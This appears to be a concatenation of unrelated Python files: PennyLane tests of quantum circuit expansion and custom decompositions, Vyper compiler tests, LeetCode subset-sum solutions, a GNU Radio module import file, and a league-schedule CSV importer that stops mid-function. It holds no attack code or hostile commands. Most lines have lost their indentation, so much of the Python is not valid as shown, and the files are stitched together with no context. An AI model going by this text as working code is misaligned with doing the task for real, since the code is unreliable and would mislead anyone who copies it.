new_tape = expand_fn(self.tape)
assert new_tape.operations == self.tape.operations
def test_device_and_stopping_expansion(self, mocker):
"""Test that passing a device alongside a stopping condition ensures
that all operations are expanded to match the devices default gate
set"""
dev = qml.device("default.qubit", wires=1)
expand_fn = qml.transforms.create_expand_fn(device=dev, depth=10, stop_at=self.crit_0)
with qml.tape.JacobianTape() as tape:
qml.U1(0.2, wires=0)
qml.Rot(*qml.numpy.array([0.5, 0.2, -0.1], requires_grad=True), wires=0)
spy_device = mocker.spy(dev, "supports_operation")
new_tape = expand_fn(tape)
spy_device.assert_called()
assert new_tape.operations[0].name == "PhaseShift"
assert [op.name for op in new_tape.operations[1:]] == ["RZ", "RY", "RZ"]
def test_device_only_expansion(self, mocker):
"""Test that passing a device ensures that all operations are expanded
to match the devices default gate set"""
dev = qml.device("default.qubit", wires=1)
expand_fn = qml.transforms.create_expand_fn(device=dev, depth=10)
with qml.tape.JacobianTape() as tape:
qml.U1(0.2, wires=0)
qml.Rot(*qml.numpy.array([0.5, 0.2, -0.1], requires_grad=True), wires=0)
spy_device = mocker.spy(dev, "supports_operation")
new_tape = expand_fn(tape)
spy_device.assert_called()
assert len(new_tape.operations) == 2
assert new_tape.operations[0].name == "PhaseShift"
assert new_tape.operations[1].name == "Rot"
def test_depth_only_expansion(self):
"""Test that passing a depth simply expands to that depth"""
dev = qml.device("default.qubit", wires=0)
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.RY(qml.numpy.array(2.1, requires_grad=True), wires=1)
qml.Rot(*qml.numpy.array([0.5, 0.2, -0.1], requires_grad=True), wires=0)
qml.templates.StronglyEntanglingLayers(
qml.numpy.ones([2, 2, 3], requires_grad=True), wires=[0, 1]
)
expand_fn = qml.transforms.create_expand_fn(depth=0)
new_tape = expand_fn(tape)
assert new_tape is tape
expand_fn = qml.transforms.create_expand_fn(depth=10)
new_tape = expand_fn(tape)
assert new_tape.operations[0] == tape.operations[0]
assert new_tape.operations[1] == tape.operations[1]
assert [op.name for op in new_tape.operations[2:5]] == ["RZ", "RY", "RZ"]
assert len(new_tape.operations[6:]) == 15
class TestExpandMultipar:
"""Test the expansion of multi-parameter gates."""
def test_expand_multipar(self):
"""Test that a multi-parameter gate is decomposed correctly.
And that single-parameter gates are not decomposed."""
dev = qml.device("default.qubit", wires=3)
class _CRX(qml.CRX):
name = "_CRX"
@staticmethod
def decomposition(theta, wires):
raise NotImplementedError()
with qml.tape.QuantumTape() as tape:
qml.RX(1.5, wires=0)
qml.Rot(-2.1, 0.2, -0.418, wires=1)
_CRX(1.5, wires=[0, 2])
new_tape = qml.transforms.expand_multipar(tape)
new_ops = new_tape.operations
assert [op.name for op in new_ops] == ["RX", "RZ", "RY", "RZ", "_CRX"]
def test_no_generator_expansion(self):
"""Test that a gate is decomposed correctly if it has
generator[0]==None."""
dev = qml.device("default.qubit", wires=3)
class _CRX(qml.CRX):
def generator(self):
                raise qml.operation.GeneratorUndefinedError()
with qml.tape.QuantumTape() as tape:
qml.RX(1.5, wires=0)
qml.RZ(-2.1, wires=1)
qml.RY(0.2, wires=1)
qml.RZ(-0.418, wires=1)
_CRX(1.5, wires=[0, 2])
new_tape = qml.transforms.expand_multipar(tape)
new_ops = new_tape.operations
expected = ["RX", "RZ", "RY", "RZ", "RZ", "RY", "CNOT", "RY", "CNOT", "RZ"]
assert [op.name for op in new_ops] == expected
class TestExpandNonunitaryGen:
"""Test the expansion of operations without a unitary generator."""
def test_do_not_expand(self):
"""Test that a tape with single-parameter operations with
unitary generators and non-parametric operations is not touched."""
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.Hadamard(0)
qml.PauliRot(0.9, "XY", wires=[0, 1])
qml.SingleExcitationPlus(-1.2, wires=[1, 0])
new_tape = qml.transforms.expand_nonunitary_gen(tape)
assert tape.operations == new_tape.operations
def test_expand_multi_par(self):
"""Test that a tape with single-parameter operations with
unitary generators and non-parametric operations is not touched."""
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.Hadamard(0)
qml.Rot(0.9, 1.2, -0.6, wires=0)
qml.SingleExcitationPlus(-1.2, wires=[1, 0])
new_tape = qml.transforms.expand_nonunitary_gen(tape)
expanded = [
qml.RZ(0.9, wires=0),
qml.RY(1.2, wires=0),
qml.RZ(-0.6, wires=0),
]
assert tape.operations[:2] == new_tape.operations[:2]
assert all(exp.name == new.name for exp, new in zip(expanded, new_tape.operations[2:5]))
assert all(exp.data == new.data for exp, new in zip(expanded, new_tape.operations[2:5]))
assert all(exp.wires == new.wires for exp, new in zip(expanded, new_tape.operations[2:5]))
assert tape.operations[3:] == new_tape.operations[5:]
def test_expand_missing_generator(self):
"""Test that a tape with single-parameter operations with
unitary generators and non-parametric operations is not touched."""
class _PhaseShift(qml.PhaseShift):
def generator(self):
return None
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.Hadamard(0)
_PhaseShift(2.1, wires=1)
qml.SingleExcitationPlus(-1.2, wires=[1, 0])
new_tape = qml.transforms.expand_nonunitary_gen(tape)
assert tape.operations[:2] == new_tape.operations[:2]
exp_op = new_tape.operations[2]
assert exp_op.name == "RZ" and exp_op.data == [2.1] and exp_op.wires == qml.wires.Wires(1)
assert tape.operations[3:] == new_tape.operations[3:]
def test_expand_nonunitary_generator(self):
"""Test that a tape with single-parameter operations with
unitary generators and non-parametric operations is not touched."""
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.Hadamard(0)
qml.PhaseShift(2.1, wires=1)
qml.SingleExcitationPlus(-1.2, wires=[1, 0])
new_tape = qml.transforms.expand_nonunitary_gen(tape)
assert tape.operations[:2] == new_tape.operations[:2]
exp_op = new_tape.operations[2]
assert exp_op.name == "RZ" and exp_op.data == [2.1] and exp_op.wires == qml.wires.Wires(1)
assert tape.operations[3:] == new_tape.operations[3:]
class TestExpandInvalidTrainable:
"""Tests for the gradient expand function"""
def test_no_expansion(self, mocker):
"""Test that a circuit with differentiable
operations is not expanded"""
x = qml.numpy.array(0.2, requires_grad=True)
y = qml.numpy.array(0.1, requires_grad=True)
with qml.tape.QuantumTape() as tape:
qml.RX(x, wires=0)
qml.RY(y, wires=1)
qml.CNOT(wires=[0, 1])
qml.expval(qml.PauliZ(0))
spy = mocker.spy(tape, "expand")
new_tape = qml.transforms.expand_invalid_trainable(tape)
assert new_tape is tape
spy.assert_not_called()
def test_trainable_nondiff_expansion(self, mocker):
"""Test that a circuit with non-differentiable
trainable operations is expanded"""
x = qml.numpy.array(0.2, requires_grad=True)
y = qml.numpy.array(0.1, requires_grad=True)
class NonDiffPhaseShift(qml.PhaseShift):
grad_method = None
with qml.tape.QuantumTape() as tape:
NonDiffPhaseShift(x, wires=0)
qml.RY(y, wires=1)
qml.CNOT(wires=[0, 1])
qml.expval(qml.PauliZ(0))
spy = mocker.spy(tape, "expand")
new_tape = qml.transforms.expand_invalid_trainable(tape)
assert new_tape is not tape
spy.assert_called()
        assert new_tape.operations[0].name == "RZ"
        assert new_tape.operations[0].grad_method == "A"
        assert new_tape.operations[1].name == "RY"
        assert new_tape.operations[2].name == "CNOT"
def test_nontrainable_nondiff(self, mocker):
"""Test that a circuit with non-differentiable
non-trainable operations is not expanded"""
x = qml.numpy.array(0.2, requires_grad=False)
y = qml.numpy.array(0.1, requires_grad=True)
class NonDiffPhaseShift(qml.PhaseShift):
grad_method = None
with qml.tape.QuantumTape() as tape:
NonDiffPhaseShift(x, wires=0)
qml.RY(y, wires=1)
qml.CNOT(wires=[0, 1])
qml.expval(qml.PauliZ(0))
params = tape.get_parameters(trainable_only=False)
tape.trainable_params = qml.math.get_trainable_indices(params)
assert tape.trainable_params == [1]
spy = mocker.spy(tape, "expand")
new_tape = qml.transforms.expand_invalid_trainable(tape)
assert new_tape is tape
spy.assert_not_called()
def test_trainable_numeric(self, mocker):
"""Test that a circuit with numeric differentiable
trainable operations is *not* expanded"""
x = qml.numpy.array(0.2, requires_grad=True)
y = qml.numpy.array(0.1, requires_grad=True)
class NonDiffPhaseShift(qml.PhaseShift):
grad_method = "F"
with qml.tape.QuantumTape() as tape:
NonDiffPhaseShift(x, wires=0)
qml.RY(y, wires=1)
qml.CNOT(wires=[0, 1])
qml.expval(qml.PauliZ(0))
spy = mocker.spy(tape, "expand")
new_tape = qml.transforms.expand_invalid_trainable(tape)
assert new_tape is tape
spy.assert_not_called()
# Custom decomposition functions for testing.
def custom_cnot(wires):
return [
qml.Hadamard(wires=wires[1]),
qml.CZ(wires=[wires[0], wires[1]]),
qml.Hadamard(wires=wires[1]),
]
def custom_hadamard(wires):
return [qml.RZ(np.pi, wires=wires), qml.RY(np.pi / 2, wires=wires)]
# Incorrect, for testing purposes only
def custom_rx(params, wires):
return [qml.RY(params, wires=wires), qml.Hadamard(wires=wires)]
# To test the gradient; use circuit identity RY(theta) = X RY(-theta) X
def custom_rot(phi, theta, omega, wires):
return [
qml.RZ(phi, wires=wires),
qml.PauliX(wires=wires),
qml.RY(-theta, wires=wires),
qml.PauliX(wires=wires),
qml.RZ(omega, wires=wires),
]
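# Quick numeric sanity check of the identity used above (illustrative helper,
# not part of the original test suite): RY(theta) == X @ RY(-theta) @ X.
def _check_ry_conjugation_identity(theta=0.3):
    X = np.array([[0.0, 1.0], [1.0, 0.0]])
    ry = lambda t: np.array([[np.cos(t / 2), -np.sin(t / 2)],
                             [np.sin(t / 2), np.cos(t / 2)]])
    return np.allclose(ry(theta), X @ ry(-theta) @ X)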
# Decompose a template into another template
def custom_basic_entangler_layers(weights, wires, **kwargs):
return [
qml.AngleEmbedding(weights[0], wires=wires),
qml.broadcast(qml.CNOT, pattern="ring", wires=wires),
]
class TestCreateCustomDecompExpandFn:
"""Tests for the gradient expand function"""
def test_no_custom_decomp(self):
"""Test that sending an empty dictionary results in no decompositions."""
def circuit():
qml.Hadamard(wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0))
original_dev = qml.device("default.qubit", wires=3)
decomp_dev = qml.device("default.qubit", wires=3, custom_decomps={})
original_qnode = qml.QNode(circuit, original_dev, expansion_strategy="device")
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
original_res = original_qnode()
decomp_res = decomp_qnode()
assert np.isclose(original_res, decomp_res)
        assert all(
            orig_op.name == decomp_op.name
            for orig_op, decomp_op in zip(
                original_qnode.qtape.operations, decomp_qnode.qtape.operations
            )
        )
def test_no_custom_decomp_template(self):
"""Test that sending an empty dictionary results in no decomposition
when a template is involved, except the decomposition expected from the device."""
def circuit():
qml.BasicEntanglerLayers([[0.1, 0.2]], wires=[0, 1])
return qml.expval(qml.PauliZ(0))
original_dev = qml.device("default.qubit", wires=3)
decomp_dev = qml.device("default.qubit", wires=3, custom_decomps={})
original_qnode = qml.QNode(circuit, original_dev, expansion_strategy="device")
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
original_res = original_qnode()
decomp_res = decomp_qnode()
assert np.isclose(original_res, decomp_res)
        assert all(
            orig_op.name == decomp_op.name
            for orig_op, decomp_op in zip(
                original_qnode.qtape.operations, decomp_qnode.qtape.operations
            )
        )
@pytest.mark.parametrize("device_name", ["default.qubit", "lightning.qubit"])
def test_one_custom_decomp(self, device_name):
"""Test that specifying a single custom decomposition works as expected."""
def circuit():
qml.Hadamard(wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0))
custom_decomps = {"Hadamard": custom_hadamard}
decomp_dev = qml.device(device_name, wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 3
assert decomp_ops[0].name == "RZ"
assert np.isclose(decomp_ops[0].parameters[0], np.pi)
assert decomp_ops[1].name == "RY"
assert np.isclose(decomp_ops[1].parameters[0], np.pi / 2)
assert decomp_ops[2].name == "CNOT"
def test_no_decomp_with_depth_zero(self):
"""Test that specifying a single custom decomposition works as expected."""
def circuit():
qml.Hadamard(wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0))
custom_decomps = {"Hadamard": custom_hadamard, "CNOT": custom_cnot}
decomp_dev = qml.device(
"default.qubit", wires=2, custom_decomps=custom_decomps, decomp_depth=0
)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 2
assert decomp_ops[0].name == "Hadamard"
assert decomp_ops[1].name == "CNOT"
def test_one_custom_decomp_gradient(self):
"""Test that gradients are still correctly computed after a decomposition
that performs transpilation."""
def circuit(x):
qml.Hadamard(wires=0)
qml.Rot(x[0], x[1], x[2], wires=0)
qml.Hadamard(wires=0)
return qml.expval(qml.PauliZ(0))
original_dev = qml.device("default.qubit", wires=3)
decomp_dev = qml.device("default.qubit", wires=3, custom_decomps={"Rot": custom_rot})
original_qnode = qml.QNode(circuit, original_dev, expansion_strategy="device")
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
x = qml.numpy.array([0.2, 0.3, 0.4], requires_grad=True)
original_res = original_qnode(x)
decomp_res = decomp_qnode(x)
assert np.allclose(original_res, decomp_res)
original_grad = qml.grad(original_qnode)(x)
decomp_grad = qml.grad(decomp_qnode)(x)
assert np.allclose(original_grad, decomp_grad)
expected_ops = ["Hadamard", "RZ", "PauliX", "RY", "PauliX", "RZ", "Hadamard"]
assert all(
[op.name == name for op, name in zip(decomp_qnode.qtape.operations, expected_ops)]
)
def test_nested_custom_decomp(self):
"""Test that specifying two custom decompositions that have interdependence
works as expected."""
def circuit():
qml.Hadamard(wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0))
custom_decomps = {"Hadamard": custom_hadamard, qml.CNOT: custom_cnot}
decomp_dev = qml.device("default.qubit", wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 7
# Check the RZ gates are in the correct place
for idx in [0, 2, 5]:
assert decomp_ops[idx].name == "RZ"
assert np.isclose(decomp_ops[idx].parameters[0], np.pi)
assert decomp_ops[0].wires == Wires(0)
assert decomp_ops[2].wires == Wires(1)
assert decomp_ops[5].wires == Wires(1)
# Check RY are in the correct place
for idx in [1, 3, 6]:
assert decomp_ops[idx].name == "RY"
assert np.isclose(decomp_ops[idx].parameters[0], np.pi / 2)
assert decomp_ops[1].wires == Wires(0)
assert decomp_ops[3].wires == Wires(1)
assert decomp_ops[6].wires == Wires(1)
assert decomp_ops[4].name == "CZ"
def test_nested_custom_decomp_with_template(self):
"""Test that specifying two custom decompositions that have interdependence
works as expected even when there is a template."""
def circuit():
# -RX(0.1)-C- -> -RX(0.1)---C--- -> -RX(0.1)-----------------C----------------
# -RX(0.2)-X- -> -RX(0.2)-H-Z-H- -> -RX(0.2)-RZ(pi)-RY(pi/2)-Z-RY(pi/2)-RZ(pi)-
qml.BasicEntanglerLayers([[0.1, 0.2]], wires=[0, 1])
return qml.expval(qml.PauliZ(0))
custom_decomps = {"Hadamard": custom_hadamard, qml.CNOT: custom_cnot}
decomp_dev = qml.device("default.qubit", wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 7
assert decomp_ops[0].name == "RX"
assert decomp_ops[0].parameters[0] == 0.1
assert decomp_ops[0].wires == Wires(0)
assert decomp_ops[1].name == "RX"
assert decomp_ops[1].parameters[0] == 0.2
assert decomp_ops[1].wires == Wires(1)
assert decomp_ops[2].name == "RZ"
assert np.isclose(decomp_ops[2].parameters[0], np.pi)
assert decomp_ops[2].wires == Wires(1)
assert decomp_ops[3].name == "RY"
assert np.isclose(decomp_ops[3].parameters[0], np.pi / 2)
assert decomp_ops[3].wires == Wires(1)
assert decomp_ops[4].name == "CZ"
assert decomp_ops[4].wires == Wires([0, 1])
assert decomp_ops[5].name == "RZ"
assert np.isclose(decomp_ops[5].parameters[0], np.pi)
assert decomp_ops[5].wires == Wires(1)
assert decomp_ops[6].name == "RY"
assert np.isclose(decomp_ops[6].parameters[0], np.pi / 2)
assert decomp_ops[6].wires == Wires(1)
def test_custom_decomp_template_to_template(self):
"""Test that decomposing a template into another template and some
gates yields the correct results."""
def circuit():
qml.BasicEntanglerLayers([[0.1, 0.2]], wires=[0, 1])
return qml.expval(qml.PauliZ(0))
# BasicEntanglerLayers custom decomposition involves AngleEmbedding
custom_decomps = {"BasicEntanglerLayers": custom_basic_entangler_layers, "RX": custom_rx}
decomp_dev = qml.device("default.qubit", wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 5
assert decomp_ops[0].name == "RY"
assert decomp_ops[0].parameters[0] == 0.1
assert decomp_ops[0].wires == Wires(0)
assert decomp_ops[1].name == "Hadamard"
assert decomp_ops[1].wires == Wires(0)
assert decomp_ops[2].name == "RY"
assert np.isclose(decomp_ops[2].parameters[0], 0.2)
assert decomp_ops[2].wires == Wires(1)
assert decomp_ops[3].name == "Hadamard"
assert decomp_ops[3].wires == Wires(1)
assert decomp_ops[4].name == "CNOT"
assert decomp_ops[4].wires == Wires([0, 1])
def test_custom_decomp_different_depth(self):
"""Test that alternative expansion depths can be specified."""
def circuit():
qml.BasicEntanglerLayers([[0.1, 0.2]], wires=[0, 1])
return qml.expval(qml.PauliZ(0))
# BasicEntanglerLayers custom decomposition involves AngleEmbedding. If
# expansion depth is 2, the AngleEmbedding will still be decomposed into
# RX (since it's not a supported operation on the device), but the RX will
# not be further decomposed even though the custom decomposition is specified.
custom_decomps = {"BasicEntanglerLayers": custom_basic_entangler_layers, "RX": custom_rx}
decomp_dev = qml.device(
"default.qubit", wires=2, custom_decomps=custom_decomps, decomp_depth=2
)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 3
assert decomp_ops[0].name == "RX"
assert np.isclose(decomp_ops[0].parameters[0], 0.1)
assert decomp_ops[0].wires == Wires(0)
assert decomp_ops[1].name == "RX"
assert np.isclose(decomp_ops[1].parameters[0], 0.2)
assert decomp_ops[1].wires == Wires(1)
assert decomp_ops[2].name == "CNOT"
assert decomp_ops[2].wires == Wires([0, 1])
def test_custom_decomp_with_adjoint(self):
"""Test that applying an adjoint in the circuit results in the adjoint
undergoing the custom decomposition."""
def circuit():
# Adjoint is RX(-0.2), so expect RY(-0.2) H
qml.adjoint(qml.RX)(0.2, wires="a")
return qml.expval(qml.PauliZ("a"))
custom_decomps = {qml.RX: custom_rx}
decomp_dev = qml.device("default.qubit", wires="a", custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 2
assert decomp_ops[0].name == "RY"
assert decomp_ops[0].parameters[0] == -0.2
assert decomp_ops[0].wires == Wires("a")
assert decomp_ops[1].name == "Hadamard"
assert decomp_ops[1].wires == Wires("a")
def test_custom_decomp_with_control(self):
"""Test that applying a controlled version of a gate results in the
controlled version of a decomposition."""
def circuit():
qml.ctrl(qml.Hadamard, control=0)(wires=1)
return qml.expval(qml.PauliZ(0))
custom_decomps = {qml.Hadamard: custom_hadamard}
decomp_dev = qml.device("default.qubit", wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 2
assert decomp_ops[0].name == "CRZ"
assert np.isclose(decomp_ops[0].parameters[0], np.pi)
assert decomp_ops[0].wires == Wires([0, 1])
assert decomp_ops[1].name == "CRY"
assert np.isclose(decomp_ops[1].parameters[0], np.pi / 2)
assert decomp_ops[1].wires == Wires([0, 1])
def test_custom_decomp_in_separate_context(self):
"""Test that the set_decomposition context manager works."""
dev = qml.device("default.qubit", wires=2)
@qml.qnode(dev, expansion_strategy="device")
def circuit():
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(wires=0))
# Initial test
_ = circuit()
assert len(circuit.qtape.operations) == 1
assert circuit.qtape.operations[0].name == "CNOT"
assert dev.custom_expand_fn is None
# Test within the context manager
with qml.transforms.set_decomposition({qml.CNOT: custom_cnot}, dev):
_ = circuit()
ops_in_context = circuit.qtape.operations
assert dev.custom_expand_fn is not None
assert len(ops_in_context) == 3
assert ops_in_context[0].name == "Hadamard"
assert ops_in_context[1].name == "CZ"
assert ops_in_context[2].name == "Hadamard"
# Check that afterwards, the device has gone back to normal
_ = circuit()
assert len(circuit.qtape.operations) == 1
assert circuit.qtape.operations[0].name == "CNOT"
assert dev.custom_expand_fn is None
def test_custom_decomp_used_twice(self):
"""Test that creating a custom decomposition includes overwriting the
correct method under the hood and produces expected results."""
res = []
for i in range(2):
custom_decomps = {"MultiRZ": qml.MultiRZ.compute_decomposition}
dev = qml.device("lightning.qubit", wires=2, custom_decomps=custom_decomps)
@qml.qnode(dev, diff_method="adjoint")
def cost(theta):
qml.Hadamard(wires=0)
qml.Hadamard(wires=1)
qml.MultiRZ(theta, wires=[1, 0])
return qml.expval(qml.PauliX(1))
x = np.array(0.5)
res.append(cost(x))
assert res[0] == res[1]
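# A minimal usage sketch of the feature exercised above (assumptions: a PennyLane
# version supporting the custom_decomps device option and the "device" expansion
# strategy, as used throughout the tests in this file).
if __name__ == "__main__":
    dev = qml.device("default.qubit", wires=2,
                     custom_decomps={"Hadamard": custom_hadamard})

    @qml.qnode(dev, expansion_strategy="device")
    def example_circuit():
        qml.Hadamard(wires=0)
        qml.CNOT(wires=[0, 1])
        return qml.expval(qml.PauliZ(0))

    example_circuit()
    # Per test_one_custom_decomp above, the executed tape is RZ, RY, CNOT.
    print([op.name for op in example_circuit.qtape.operations])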
|
import pytest
from pytest import raises
from vyper import compiler
from vyper.exceptions import FunctionDeclarationException
fail_list = [
"""
@public
def foo() -> int128:
pass
""",
]
@pytest.mark.parametrize('bad_code', fail_list)
def test_missing_return(bad_code):
with raises(FunctionDeclarationException):
compiler.compile(bad_code)
valid_list = [
"""
@public
def foo() -> int128:
return 123
""",
"""
@public
def foo() -> int128:
if False:
return 123
""", # For the time being this is valid code, even though it should not be.
]
@pytest.mark.parametrize('good_code', valid_list)
def test_return_success(good_code):
assert compiler.compile(good_code) is not None
|
from slate import __version__
def test_version():
assert __version__ == '0.1.0'
|
"""
416. Partition Equal Subset Sum
"""
class Solution:
def canPartition(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
def dfs(beg,target):
if target == 0:
return True
for i in range(beg, len(nums)):
if target >= nums[i]:
if dfs(i+1, target - nums[i]):
return True
else: break
return False
s = sum(nums)
if s & 1:
return False
s = s >> 1
nums.sort(reverse = True)
return dfs(0,s)
class Solution:
def canPartition(self, nums):
if sum(nums) & 1 == 0:
target = sum(nums) >> 1
cur = {0}
for i in nums:
cur |= {i + x for x in cur}
if target in cur:
return True
return False
from functools import reduce

class Solution:
    def canPartition(self, nums):
        return (sum(nums) / 2.) in reduce(lambda cur, x: cur | {v + x for v in cur}, nums, {0})
class Solution:
def canPartition(self, nums):
total = sum(nums)
if total % 2 == 1: return False
target = total / 2 #target sum
s = set([0]) #stores the sums of the subsets
for n in nums:
sums_with_n = [] #stores the sums of the subsets that contain n
for i in s:
if i + n == target: return True
if i + n < target:
sums_with_n.append(i + n)
s.update(sums_with_n)
return False
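# Quick sanity check using the LeetCode 416 sample cases; Solution here refers
# to the last definition above (the set-based DP).
if __name__ == "__main__":
    s = Solution()
    print(s.canPartition([1, 5, 11, 5]))  # True: [1, 5, 5] and [11]
    print(s.canPartition([1, 2, 3, 5]))   # False: no equal-sum split exists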
|
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from cmakefile_editor import CMakeFileEditor
from code_generator import GRMTemplate
from grc_xml_generator import GRCXMLGenerator
from modtool_base import ModTool, ModToolException, get_class_dict
from modtool_add import ModToolAdd
from modtool_disable import ModToolDisable
from modtool_info import ModToolInfo
from modtool_makexml import ModToolMakeXML
from modtool_newmod import ModToolNewModule
from modtool_rm import ModToolRemove
from modtool_rename import ModToolRename
from templates import Templates
# Leave this at the end
from modtool_help import ModToolHelp
from parser_cc_block import ParserCCBlock
from util_functions import *
|
'''
@author: Dallas Fraser
@date: 2016-04-12
@organization: MLSB API
@summary: Holds a class LeagueList that helps import a League (list of games)
'''
# imports
from sqlalchemy import func
from api.model import Sponsor, Game, League, Division
from api import DB
from api.errors import InvalidField, LeagueDoesNotExist, TeamDoesNotExist,\
DivisionDoesNotExist
import logging
import datetime
# constants
MISSING_BACKGROUND = "Missing background: {}"
LEFT_BACKGROUND_EXAMPLE = "Background example was left: {}"
INVALID_TEAM = "{} is not a team in the league"
INVALID_ROW = "Unsure what to do with the following row: {}"
INVALID_LEAGUE = "League given was not found: {}"
INVALID_DIVISION = "Division given was not found: {}"
INVALID_GAME = "The game was invalid - {} with error {}"
TEAM_NOT_FOUND = "Did not find team {} - for row {}"
BACKGROUND = {"league": "League", "division": "Division"}
HEADERS = {"home": "Home Team",
"away": "Away Team",
"date": "Date",
"time": "Time",
"field": "Field"}
class LeagueList():
def __init__(self,
lines,
year=datetime.datetime.now().year,
logger=None,
session=None):
"""A constructor
lines: a list of lines from the csv
year: the year the league was
logger: a logger
session: mock a database session
"""
self.success = False
self.errors = []
self.warnings = []
self.lines = lines
if logger is None:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(message)s')
logger = logging.getLogger(__name__)
self.logger = logger
self.year = year
self.session = session
if session is None:
self.session = DB.session
def import_league_functional(self):
""" Add a team to the database using functions instead of methods"""
        # parse out the parts - background, header, games
parts = parse_parts(self.lines)
self.warnings = parts['warnings']
        # extract the background, such as the league and division
background = extract_background(parts['background'])
league = background["league"]
division = background["division"]
        # extract the column indices using the header as a lookup
lookup = extract_column_indices_lookup(parts['header'])
# get the team map
team_lookup = get_team_lookup(league)
# extract the games
games = extract_games(parts["games"], team_lookup, lookup)
self.warnings = self.warnings + games['warnings']
        # add the games
for game_json in games['games']:
try:
game = Game(game_json["date"],
game_json["time"],
game_json["home_team_id"],
game_json["away_team_id"],
league["league_id"],
division["division_id"],
field=game_json["field"])
self.session.add(game)
except Exception as error:
game_list = [str(value) for value in game_json.values()]
game_info = "-".join(game_list)
self.warnings.append(INVALID_GAME.format(game_info,
str(error)))
self.session.commit()
def get_team_lookup(league, year=datetime.datetime.today().year):
'''
    a function that builds a lookup from team names to team ids for the league
Parameters:
league: the json league object
year: the year we are importing for
Returns:
teams: a dictionary object lookup for teams
'''
teams = {}
league = League.query.get(league["league_id"])
if league is None:
raise LeagueDoesNotExist(payload={'details': league})
for team in league.teams:
if team.year == year:
teams[str(team)] = team.id
sponsor = str(Sponsor.query.get(team.sponsor_id))
teams[sponsor + " " + team.color] = team.id
return teams
def extract_column_indices_lookup(header):
""" Returns a dictionary used to lookup indices for various fields
Parameters:
header: the header array
Returns:
a dictionary {str(field): int(index)}
"""
lookup = {}
for i in range(0, len(header)):
for key, value in HEADERS.items():
if is_entry_a_header(key, value, header[i]):
lookup[key.lower()] = i
# ensure all headers were found
for key in HEADERS.keys():
if key not in lookup.keys():
error_message = "{} header missing".format(key.lower())
raise InvalidField(payload={'details': error_message})
return lookup
def is_entry_a_header(key, value, entry):
"""Returns whether the given entry in the header is a expected header."""
return (key.lower() in entry.lower() or
value.lower() in entry.lower())
def is_game_row_valid(game, lookup):
"""Returns whether all columns can be found in the game entry.
Parameters:
game: the entry for the game
lookup: a lookup for fields to indexes in columns
Returns:
        True if the row is valid, otherwise False
"""
for index in lookup.values():
        if index >= len(game):
return False
return True
def extract_game(game, team_lookup, lookup):
"""Returns a game json object
Parameters:
game: the entry for the game
team_lookup: a lookup for team names to player ids
lookup: a lookup for fields to indexes in columns
Returns:
a json game object, None if game data not found
"""
if not is_game_row_valid(game, lookup):
return None
away = game[lookup["away"]].strip()
home = game[lookup["home"]].strip()
time = game[lookup["time"]].strip()
field = game[lookup["field"]].strip()
date = game[lookup["date"]].strip()
# check if variables meet certain conditions
# else should be good to add game
away_team = team_lookup.get(away, None)
home_team = team_lookup.get(home, None)
if away_team is None:
        error_message = INVALID_TEAM.format(away)
raise TeamDoesNotExist(payload={'details': error_message})
if home_team is None:
        error_message = INVALID_TEAM.format(home)
raise TeamDoesNotExist(payload={'details': error_message})
return {"away_team_id": away_team,
"home_team_id": home_team,
"time": time,
"field": field,
"date": date}
def extract_games(games, team_lookup, lookup):
"""Returns a dictionary with list of games and warnings
Parameters:
games: the games entry rows
team_lookup: a lookup for team names to the team ids
lookup: a lookup for column indices
Returns:
a dictionary with a list of games and a list of warnings
"""
result = []
warnings = []
for game in games:
try:
game = extract_game(game, team_lookup, lookup)
if game is not None:
result.append(game)
